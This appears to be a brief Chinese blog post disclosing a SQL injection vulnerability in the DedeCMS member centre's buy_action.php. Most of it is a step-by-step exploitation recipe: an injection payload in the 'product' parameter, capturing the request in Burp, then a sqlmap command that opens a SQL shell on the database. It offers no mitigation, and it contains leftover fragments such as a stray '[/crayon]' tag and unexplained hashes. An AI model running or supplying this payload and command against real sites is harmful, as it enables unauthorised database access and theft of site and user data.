Dedecms 会员中心注入漏洞

文章目录

漏洞作者: Matt

[/crayon]

漏洞证明:

利用方式 注册用户之后登陆

打开http://127.0.0.1/dede/member/buy_action.php?product=1′ and @' and

1=1* and ‘1’=’1

先利用burp抓一下访问包

然后将抓到的内容保存

然后利用sqlmap进行注入 执行如下命令

sqlmap.py -r c:\1.txt –sql-shell –threads=10 –dbms mysql

其中的1.txt就是我们保存的包文件

13213901b06de5f82fdb9aeb9be25589099db3a4

13213850c95d5286066b6f5374bfdb41a4b81ac7

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录